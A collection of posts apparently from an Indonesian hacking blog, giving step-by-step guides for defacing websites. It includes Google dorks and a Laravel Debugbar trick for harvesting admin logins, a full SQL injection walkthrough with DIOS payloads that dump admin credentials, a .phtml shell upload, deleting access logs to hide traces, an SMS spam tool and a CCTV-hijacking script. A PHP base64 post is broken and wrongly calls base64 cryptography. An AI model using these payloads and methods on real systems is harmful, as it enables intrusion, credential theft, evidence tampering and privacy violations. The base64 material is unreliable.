Deface poc Debugbar

 

Bagi kalian yg sering nemuin laravel debugernya nyala kayak foto yg pertama jngan diskip bisa jadi celahnya ada disitu dan juga bisa dimanfaatin jadi bug bounty.

Dork: intext:php debugbar data inurl:/auth

intext:php debugbar data inurl:/login

intext:.php debugbar data inurl:/register

intext:php debugbar data inurl:/daftar

intext:php debugbar data inurl:/admin

intext:php debugbar data inurl:/panel

intext:php debugbar data inurl:/akses ke

intext:php debugbar data inurl:/dashboard

intext:php debugbar data inurl:/loginRoute

Intext:"PHP DEBUGBAR" intext:"login" site:id

Dork Sange PHP Debugbar Fresh

Dorking dulu di google

Ikuti langkah berikut

1. klik tanda folder yg disamping tanda

2. Kemudian pada bagian METHOD pilih POST setelah itu klik search

3. Bila sudah nanti akan ada banyak pilihan, dan cari aja yg url /login, setelah itu klik urlnya.

4. Terus nanti bakal muncul di bar debugernya, masuk kebagian  " Request " setelah itu cari " request_request " atau " $_POST " ini suka ada yg beda beda tetapi biasanya ada salah satu di dua itu.

5. Kemudian klik aja tanda [ > ] dan boom, biasanya disitu ada akun admin yg baru aja login.

6. tinggal cari halaman loginya terus login deh.

Bisa juga pake dork misal : intext:PHP DEBUGBAR STACK DATA inurl:/login , Selebihnya bisa dikembangin sendiri

.

Share:

Lanjut

Menghapus Jejak Pada Website Yang di Deface

 Menghapus Jejak Pada Website Yang di Deface

"Cara Mengahpus Jejak Pada Website Yang di Deface" orang-orang juga jarang memperhatikan ini

Mengapus File Access-Logs

Mungkin terdengar asing di telinga kalian yg biasa mendengar,

Hal ini juga sering di spelekan oleh orang-orang, kenapa ? karena buru-buru mau masukin hasil deface ke mirror, it's true ?. ok langsung simak tutorialnya.

1. Buka Shell hasil deface kalian tadi.

2. Pindah direktori ke direktori root. kaga tau direktori root ?? biasanya itu nama user web nya (liat gambar)

 3. Setelah pindah ke direktori root (klo misalnya kaga muncul daftar direktorinya, berarti permission denied, kaga vuln) pilih direktori access-logs (atau semacamnya)

4. Buka dir tersebut,

5. Akan muncul file, biasanya sih nama domain websitenya.

6. Delete deh,, :) (kalo gagal berarti permission denied, kaga vuln)

Cara Alternatif

Pakai VPN atau Proxy dan semacamnya. biar aman,

pke VPN atau Proxy adalah LEMOT !!

Kecuali ada VPN atau Proxy yg speednya up 50Mbps, WOW !!!

Sekian dulu tutorial kali ini semoga bermanfaat, kalo gak bermanfaat ya manfaatin aja.

Share:

Lanjut

Deface Poc SQL with DIOS

Assalamualaikum wr.wb

Kali ini saya akan memberikan Tutorial cara Deface

POC SQL manual with DIOS. Oke langsung saja simak

[#] Bahan - Bahan
1. Dork ( di kembangin lagi )

inurl:"merchandise/index.php?cat="
inurl:".php?index="
inurl:".php?CID="
inurl:".php?SID="
inurl:".php?term="
inurl:".php?sellerID="
inurl:".php?func="
inurl:".php?idz="
inurl:".php?opt="
inurl:".php?txtMainNavID="
inurl:".php?main="
inurl:".php?mood&cat="
inurl:".php?ResultGridPage="
inurl:".php?machineid="
inurl:".php?p1="
inurl:".php?uid="
inurl:".php?typeid="
inurl:".php?calls="
inurl:".php?pt="
inurl:".php?q="
inurl:".php?prod_cat_main="
inurl:".php?prod_cat="
inurl:".php?gid="
inurl:".php?psid="
inurl:".php?tid="
inurl:".php?brand="
inurl:".php?catld="
inurl:".php?name="
inurl:".php?c_id="
inurl:".php?s_id="
inurl:".php?p_id="
inurl:".php?subtype="
inurl:".php?cateid="
inurl:".php?catepid="
inurl:".php?pttype="
inurl:".php?statusik="
inurl:".php?aid="
inurl:".php?gid="
inurl:".php?bo_table="
inurl:".php?recordID="
inurl:".php?sel="
inurl:".php?nav_id="
inurl:".php?shopGroupId="
inurl:".php?idsc="
inurl:".php?pc1="
inurl:".php?pno="
inurl:".php?elid="
inurl:".php?for="
inurl:".php?pricat="
inurl:".php?parent_id="
inurl:".php?brand_id="
inurl:".php?pcid="
inurl:".php??product_id="

 2.Kuota Yang Cukup(Kalo Kaga Ada

    Ya Pake Wifi)

3. Kesabaran :v

4. Niat

5. Kopi,Rokok(Biar Santuy Eaa Coeg)

6. Dios

// Step by step Defacenya //

1. Dorking Dulu Pake Dork Yang Di  Atas....

2. Pilih Site Target Yang Kira Kira Vuln...
Gw Pake Site
http://www.sitetarget.co.li/news.php?id=1

3. Cek Vuln Atau Nggaknya..
Caranya Tambain ' Di Target..

Contoh::

http://www.sitetarget.co.li/news.php?id=1

Jadinya..

http://www.sitetarget.co.li/news.php?id=1'

Kalo Vuln Ada Perubahan Dari Site Targetnya...
Misal :: (Your SQL Syntax Blablablabla , Blank , Ada Yang Berubah...)

4. Lanjut Ke Order Bynya..

http://www.sitetarget.co.li/news.php?id=1+order+by+1--+-
(TIDAK ERROR)

Kita Cari Errornya:v

http://www.sitetarget.co.li/news.php?id=1+order+by+2--+-
( TIDAK ERROR )
http://www.sitetarget.co.li/news.php?id=1+order+by+3--+-
( TIDAK ERROR )
http://www.sitetarget.co.li/news.php?id=1+order+by+4--+-
( TIDAK ERROR )

http://www.sitetarget.co.li/news.php?id=1+order+by+5--+-
( NAH INI BARU ERROR )

Lanjut Ke Union Select(Karna Kita Kan Dah Tau Tuh Jumlah Kolomnya...)

http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,3,4--+-

Nah... Nongol Nih Angka Cantiknya...
3 , 2

Kita Masukin Diosnya Di angka Cantik Yang Nongol Tadi..

(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)

Jadinya Gini...

http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x),4--+-

Next..
Kita Dump User Password adminnya
Caranya..

(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatabel)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namakolom,0x203a3a20,namakolom))))x)

Begini Jadinya eaa

http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admin)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4--+-

Nah Kan..
Ketemu User Pasword Adminnya :D
Next Cari Admin Loginnya(adlog)
Kalo Ada..
Langsung ae Login Pake User Password Yang Kita Dapet Tadi..
Kadang.. Passwordnya Harus Di Crack Lagi:v(Sandi Yang Berupa Algoritma" MD5,MD4,MD2,SHA1,Base64 dan banyak Lainnya)
Kalo Udah Berhasil Login..

Dan upload Shell kalian jangan lupa kalo mau Tebas Di Backup dulu coek kesian admin nya sama developer nya ya anjim

Sekian Dari Gw Salam heker😎

Share:

Lanjut

Encode dan decode base64 pada programan php

Assalamualaikum wr.wb

 saya akan membahas  tentang Encode dan decode base64 pada programan php.

Base64 adalah tehnik menerjemahkan data biner yang berbentuk ASCII. Base64 ini berguna untuk menyembunyikan data data penting seperti contohnya password agar tidak diketahui oleh orang lain.

Tehnik Encode dan decode base64 ini bertujuan sama seperti md5 yaitu cryptography dan di Pemprograman php ini sudah di sediakan untuk Encode dan decode pada text kita.

Untuk membuat decode dan Encode dengan menggunakan php ini kalian bisa pakai :

• base64_encode() = berguna untuk meng-Encode text 
• base64_decode() = berguna untuk meng-decode text atau menerjemahkan hasil dari Encode tersebut 

Untuk penggunaan encode kalian bisa ketik coding di bawah ini :

 <?php

 $code = "aku gans sangat";
echo base64_encode($code);
?>

Dan hasilnya :

Bisa kita lihat di sini hasil dari Encode yang saya buat tadi.

Sedangkan jika kita ingin meng-decode text tersebut kita ketik seperti di bawah ini:

 <?php
$code = "aku gans sangat";
echo base64_encode(base64_decode($code) ;
?>

 Dan untuk hasilnya :

Ok cukup sekian tutorial buat kali ini semoga bermanfaat

Share:

Lanjut

Script Deface Noesantara9etar

                                                          Hacked By Mr.FBSN./404
                                                   I Love Nusantara In Indonesia People !
                                                        Copy Right ByNoesantara9etar

Link Script Deface ( disini )

Share:

Lanjut

5 Teknik Dasar Social Egineering

Sebenarnya, teknik ini tidak hanya dilakukan oleh penjahat atau kriminal tapi polisi dan penegak hukum pun menggunakannya untuk memata-matai target operasi dan mendapatkan informasi tentang targetnya.

Nah, social enggineering sendiri memiliki lima teknik yang paling populer. Berikut jenis-jenisnya.

1. Phishing

Teknik phishing ini merupakan taktik penipuan yang paling sering digunakan sekarang ini. Beberapa penipuan Phishing digunakan untuk mendapatkan informasi personal seseorang seperti nama, alamat dan nomor keamanan sosial.

Selain itu, bisa juga dengan cara mengatasnamakan situs resmi seperti PayPal, Facebook atau situs lain yang mengharuskan seseorang untuk memasukkan email dan password, padahal sebenarnya situs tersebut adalah buatan si hacker.

Dengan cara ini hacker mendapatkan semua data yang diperlukan untuk mengambil alih akun seseorang.

2. Pretexting

Taktik pretexting ini adalah teknik yang digunakan hacker dengan cara berbicara layaknya para ahli. Hacker yang kita ketahui sangat mahir dalam hal teknis, tapi ketika hacker menggunakan social engineering, maka hacker bisa berbicara sangat lancar seperti seorang ahli.

Seperti Gamble yang mengaku bahwa sebagai Brennan untuk mengakses komputernya, ketika menelepon CIA. Itu berarti Gamble bisa sangat meyakinkan petugas CIA bahwa dia adalah Brennan yang asli.

3. Baiting

Baiting adalah teknik yang hampir sama seperti Phishing, yaitu memberikan pancingan berupa hadiah barang atau hal-hal yang menarik korban untuk membuka situs yang dibuat hacker.

Baiting kebanyakan menawarkan korbannya musik gratis atau unduhan film, termasuk film porno, dengan kecepatan yang lebih cepat. Setelah mengklik situs tersebut, korban harus memasukkan email dan password mereka.

Anonymous Hacker. (Foto: REUTERS/Yves Herman)

4. Quid Pro Quo

Secara harfiah, Quid Pro Quo berarti 'sesuatu untuk sesuatu'. Konsep ini menjanjikan korban keuntungan yang sama yang akan mereka dapatkan dari informasi yang mereka berikan.

Taktik ini paling umum dilakukan oleh hacker yang berpura-pura menjadi orang layanan IT dan menelpon sebanyak-banyaknya orang dari perusahaan yang dapat mereka temukan.

Hacker ini akan menawarkan bantuan kepada korbannya dengan menjanjikan perbaikan sistem IT yang lebih cepat dengan catatan perusahaan harus menonaktifkan program AV mereka untuk melakukan perbaikan tersebut.

Lebih parahnya, hacker dengan taktik ini bisa jadi memiliki kemampuan yang lebih baik daripada orang layanan IT sungguhan.

5. Tailgating

Beberapa orang mengenal istilah Tailgating ini dengan Piggyback. Taktik ini dilakukan dengan cara menguntit seseorang yang memiliki otentikasi, seperti karyawan perusahaan untuk masuk ke area yang tidak bisa diakses orang asing.

Biasanya, pelaku tailgating, akan meniru kurir pengirim barang dan menunggu di luar gedung. Ketika seorang karyawan yang memiliki akses untuk masuk ke dalam area tersebut membuka pintu masuk, pelaku akan mengikutinya dengan menahan pintu itu lalu masuk ke dalam gedung. Sumber : Kumparan.com ~Mr.FBSN./404

Share:

Lanjut

Rilis Tools Spam Sms Simcard 3 Work !

Yoo Yooo Yooo Whatsappp My friends :v
Udah lama mimin gak update nih blog :D Yaa Maklum Sibuk Muluu Lah :D

Yaaa Mimin kali ini mau share gimana cara spam sms simcard / kartu 3 (khusus pengguna kartu 3)

 

Okeee  Lanjut Ini Bisa Pakek Termux / Terminal yak




Cara Gunain :
 1 . Edit dulu nomer yg akan kita mass spam !
 ( DISINI W MAU MASS SPAM SMS DALAM SATU NOMER )
w spam 8 sms nanti 8 sms akan masuk ke hp korban

kalo udah di save ctrl + x >> y


2. Buka spantri.py nya
Buka Tuh Toolsnya Caranya
$python spantri.py
abis itu enter maka akan menampilkan gini


3. Masukan Path file list.txtnya
karena file list.txtnya dalam satu folder jadi kita tinggal ketik
[*] List >> list.txt



Setelah itu dia akan langsung Mengkhitung jumlah pesan yg ada di list.txt dan langsung mengirim pesan tanpa delay


Okee mungkin itu aja dari mimin kali ini

Masih Bingung ? Cek Youtube Ku Mhankkk ;*

Link Download Script : Klik Me Senpai ;* 
 Youtube : Klik Me Senpai ;*

Share:

Lanjut

Tutorial Deface POC Kawaii FIle Hosting Simple

Yoo Yooo Yooo Whatsappp My friends :v
Udah lama mimin gak update nih blog :D Yaa Maklum Sibuk Muluu Lah :D

Okeee Kali ini mimin mau share nih gimana cara deface POC Kawaii File Hosting. Ini simple kok gak susah.


Langsung aja gan
=====================

Dork: "Kawaii File Host"

          "Kawai File Hosting"

 

Exp : Gada

 

EXT : .phtml

=====================

 

Searcing gan 

 

Pilih salah satu gan Langsung Buka Nih 

Nahh Setelah itu upload script lu yg berekstensi ".phtml"


Dah ke upload tuh sekarang tinggal klik linkny aja
Andd booommm !!!!


 


Masih bingung ? Tenang W ada link youtubenya kok jangan lupa nih like,komen,share, and subscribe yakk  :*

Klik Disini Mhamank link ke yt ;*

Share:

Lanjut

Tools Admin Finder

Assalamu alaikum Wr Wb.

Kali ini Mimin yang gans ini Ingin Memberi Tools Admin Finder

Tools ini sangat bermanfaat bagi kalian yang tidak mengetahui adminweb pada salah satu website.

Ya ini Dia Software / Tols nya Ya gan 

Lalu...... bagaimana cara untuk menggunakannya ..?

pada kolom
1.yang tertulis http://www.contoh.com/ ganti
2.kemudian masukkan alamat website target kalian,
3. kemudian Star Scan dan tunggu sampai muncul Hasilnya
yang ada pada sebelah kiri

kemudian bagi yang ingin mempercepat hasil Scannya tinggal ganti intervalnya saja, dengan cara pilih Setting kemudian ganti intervalnya disitu sudah tertulis interval minimum 50.

Tols Atau Software nya Bisa Di Download  Gambar Di  bawah ini

Sekian Dan Terima Kasih Semoga Bermanfaat ya Gans
Salam BekasiSec
Thnks Admin BekasiSec
-Mr.FBSN./404
-Nii-San Hexor

Share:

Lanjut

Release News Tools ShellFinder [CLI]

Yoooooo Gaann :V
udah lama mimin gak update nih blog :v biasa sibuk teroos lah haha :v

okee langsung aja yaa

Disini Mimin Udah Buat Tools Shell Finder Yaaa sama kek admin finder sih tapi shell finder kali ini pakek mode CLI / Command Line Interface . Bisa Kok Di Termux hehe .

[ SHELL FINDER ]

Coded By : Nii-san Haxor
Programming Language : Python3
Tested On : KaliLinux,MacOSX,Termux

Cara Pakeknya Hampir Mirip Kek SQLMAP

NB : KALIAN BOLEH NAMBAHIN WORDLISTNYA !

python3 shell.py -u [url] -w [wordlist.txt]

abis itu enter dan lihat apa yg terjadi

Ingin Mencobanya ?
Langsung aja

Termux :

$apt-get install python3
$git clone https://github.com/arifarhan16/shellFin.git
$cd shellFin
$chmod +x shell.py
$python3 shell.py -u [url] -w [wordlist.txt]


Linux :
#git clone https://github.com/arifarhan16/shellFin.git
#cd shellFin
#chmod +x shell.py
#./shell.py -u [url] -w [wordlist.txt]

Bingung ? Lihat Di SINI

Share:

Lanjut

Cara Hack CCTV Mudah Menggunakan Terminal / Termux !

Yoooo Gaaan :v
Udah Lama mimin gak update blog :v ya biasa mimin sibuk neh :v biasa hehe

okeeeyyy sebelumnya apa kabar :v
udah yok lanjut

yooshh sekarang mimin mau share gimana cara hack cctv menggunakan terminal / termux mudah kok :v

okeeyy lanjut kita download apa yg kita butuhkan terlebih dahulu

Termux :

1. apt update
2. apt upgrade
3. pkg install python2
4. pkg install git
5. pip2 install requests
6. git clone https://github.com/arifarhan16/ipcams.git
7. ls
8. cd ipccams
9. python2 sc.py

Linux :

1. git clone https://github.com/arifarhan16/ipcams.git
2. ls
3. cd ipccams
4. python2 sc.py

Okeeeyy itu dia

Cara Gunainnya Gampang Koq

1.Masuk ke direktori ipcams

Syntax : $ cd ipcams

2. Jalankan

syntax : $python2 sc.py

Nanti Tampilannya Seperti Itu Hehe

Nah Jika sudah seperti itu pilih nomer negara yg kalian ingin hack

Disini mimin mau pilih nomer 2 yaitu indonesia

Nb. Jika Ketika Memilih Kemudian Blank gak keluar apa apa biarkan saja itu tandanya proses hack sedang dilakukan

and then

Okeeyy Jika gini udah ada beberapa cctv yg telah kita hack
and kita pilih page berapa yg mau kita buka videonya ( video 100% real )

OKEEYYY
next

jika setelah memasukan page yg udah kita hack tadi tinggal nanti akan keluar ip address cctv yg berhasil kita hack

ang langkah yg terakhir copy link tersebut ke google chrome / aplikasi peramban kalian and lihat apa yg terjadi......

Jika KURANG JELAS Klik Link INI

Share:

Lanjut